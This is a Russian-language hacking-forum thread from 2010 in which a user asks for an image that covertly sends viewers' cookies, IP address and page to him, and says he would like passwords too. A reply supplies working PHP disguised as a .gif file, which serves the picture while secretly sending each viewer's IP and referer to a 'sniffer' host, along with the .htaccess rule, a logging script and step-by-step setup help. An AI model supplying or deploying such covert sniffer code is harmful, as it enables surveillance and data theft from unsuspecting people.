ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > Реверсинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Картинка ворует cookie
  #1  
Старый 09.02.2010, 20:53
Аватар для akkolt
akkolt
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961

Репутация: 0
По умолчанию Картинка ворует cookie

Доброго времени суток, очень нужно реализовать подобную вещь:
Пользователь открывает страницу с изображением (допустим аватаркой) при просмотре данного изображения, оно отправляет cookies данного пользователя на определенный email
Использование сторонних скриптов на странице не прокатит, скрипт должен быть внедрен прямо в изображение
В прочем многого то мне получать и не нужно (лишь ip, страница, где находилось изображение... Хотя от паролей бы не отказался.. но это уже лишь ради шалости )) )
Мучаюсь над этим вопросом уже 2й день, в интернете абсолютно ничего на эту тему нет... =-(

Может быть существует некий сниффер, обрабатывающий избражение, которое находится на стороннем хосте, а не на самом сервере сниффера? Такое решение тоже подойдет
Слышал про Img_Sniffcookgrab.exe , но так нигде найти не смог
 
Ответить с цитированием

  #2  
Старый 09.02.2010, 20:59
Аватар для altblitz
altblitz
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047

Репутация: 759


Отправить сообщение для altblitz с помощью ICQ
По умолчанию

элементарно.
изображение - лишь часть веб-контента, с JScript можно и не такое.

пассы снимаю не так. and no word anymore.
 
Ответить с цитированием

  #3  
Старый 09.02.2010, 21:04
Аватар для akkolt
akkolt
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961

Репутация: 0
По умолчанию

Дело в том, что есть только изображение, сторонние скрипты в данном случае - не выход
 
Ответить с цитированием

  #4  
Старый 10.02.2010, 06:28
Аватар для lis84
lis84
Познающий
Регистрация: 28.04.2009
Сообщений: 61
Провел на форуме:
103259

Репутация: 37
По умолчанию

Есть подозрение что такое невозможно. (если только на картинку ссыль)
Если есть возможность сослаться на скрипт который генерит картинку, то тогда можно
Типа линеечек которые в подписи любят многие пихать, она генерится скриптом.

ПыСы. А ещё интересно где тут реверсинг?
ПыПыСы. Ну и кукисы разумееццо тоже, а вот ip юзера и страница откуда отрыли однако реально.

Последний раз редактировалось lis84; 10.02.2010 в 08:25..
 
Ответить с цитированием

  #5  
Старый 10.02.2010, 08:50
Аватар для akkolt
akkolt
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961

Репутация: 0
По умолчанию

Извиняюсь, ошибся разделом
Ну куки в принципе мне не так и нужны, мне нужно знать ip и реферрор, вроде видел подобеный код на php, но не знаю, как им воспользоваться...
 
Ответить с цитированием

  #6  
Старый 10.02.2010, 09:46
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Ну вот простецкий вариант. Скрипт img.gif, генерящий картинку
PHP код:
<?php
  $im 
imagecreatefromgif ('image.gif');
  if (
$im) {
    
header ('Content-Type: image/gif');
    
imagegif ($im);
    
imagedestroy ($im);
    
$sock fsockopen ('mysniffer.com'80$errno$errstr30);
    if (
$sock) {
      
fwrite ($sock"GET /sniff.php?ip=" getenv ('REMOTE_ADDR')
        . 
"&referer=" getenv ('HTTP_REFERER'
        . 
" HTTP/1.1\r\nHost: server.com\r\nConnection: close\r\n\r\n");
      
fclose ($sock);
    }
  }
?>
Файл .htaccess для него
Код:
AddType application/x-httpd-php .gif
Сам "сниффер" - sniff.php
PHP код:
<?php
  $log 
'sniff.log';
  if (!empty (
$_GET)) {
    if (
file_exists ($log) && is_writeable ($log))
      
file_put_contents ($log$_SERVER['QUERY_STRING']);
    else
      echo 
'File doesn\'t exist or not writeable';
  }
?>
 
Ответить с цитированием

  #7  
Старый 10.02.2010, 19:49
Аватар для akkolt
akkolt
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961

Репутация: 0
По умолчанию

Если можно, то пожалуйста подробнее, как это использовать?
Первый скрипт как я понял вставляется в файл .gif но где указать изображение, которое сгенерится?
Затем создается файл .htaccess Куда его девать?
sniff.php - думаю это на хост, поддерживающий пхп, или ошибаюсь?

Последний раз редактировалось akkolt; 10.02.2010 в 19:52..
 
Ответить с цитированием

  #8  
Старый 10.02.2010, 19:58
Аватар для EoGeneo
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

Хех...это же элементарно. если хостинга нету. Регаешься тут ТАм тебе дадут ссылку на картинку такого вида www.сайт/userbars/img_4_4383.gif - её шлеш на почту и ждешь на сайте где регался логи. С той инфой которая тебе нужна.
 
Ответить с цитированием

  #9  
Старый 10.02.2010, 20:05
Аватар для akkolt
akkolt
Новичок
Регистрация: 08.02.2010
Сообщений: 8
Провел на форуме:
9961

Репутация: 0
По умолчанию

Это элементарно, читайте внимательнее, в первом посте сказано, что есть лишь картинка, больше ничего...
Мне не нужно никого ломать, для этого есть более подходящие способы
Если и использовать сниффер, то только тот, что способен обработать левое изображение, т.е. не кидать ссылку пользователю (п.с. изображение будет вообще статично в сети интернет, ни кому оно передаваться не будет), а загрузить изображение на хост, и затем указать ссылку на это изображение в настройках сниффера, так, чтобы сниффер его обрабатывал. Но ни как не наоборот
 
Ответить с цитированием

  #10  
Старый 11.02.2010, 10:23
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

akkolt, путь к картинке прописан в строке
PHP код:
$im imagecreatefromgif ('image.gif'); 
Картинка лежит рядом с файлом. Имя файла может быть любым (.GIF). .htaccess кладется также в тот же каталог, где лежит img.gif
Цитата:
sniff.php - думаю это на хост, поддерживающий пхп, или ошибаюсь?
Именно так, только пути и урлы правильно в скриптах пропишите. И создайте пустой файл sniff.log рядом со сниффером с правами 0666.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Фальсификация cookie k00p3r Чужие Статьи 6 11.04.2010 19:36
Перехват cookie c помощью JAVA-апплетов LeverOne Авторские статьи 3 26.11.2009 21:48
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Cookies Болталка 9 11.01.2004 03:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ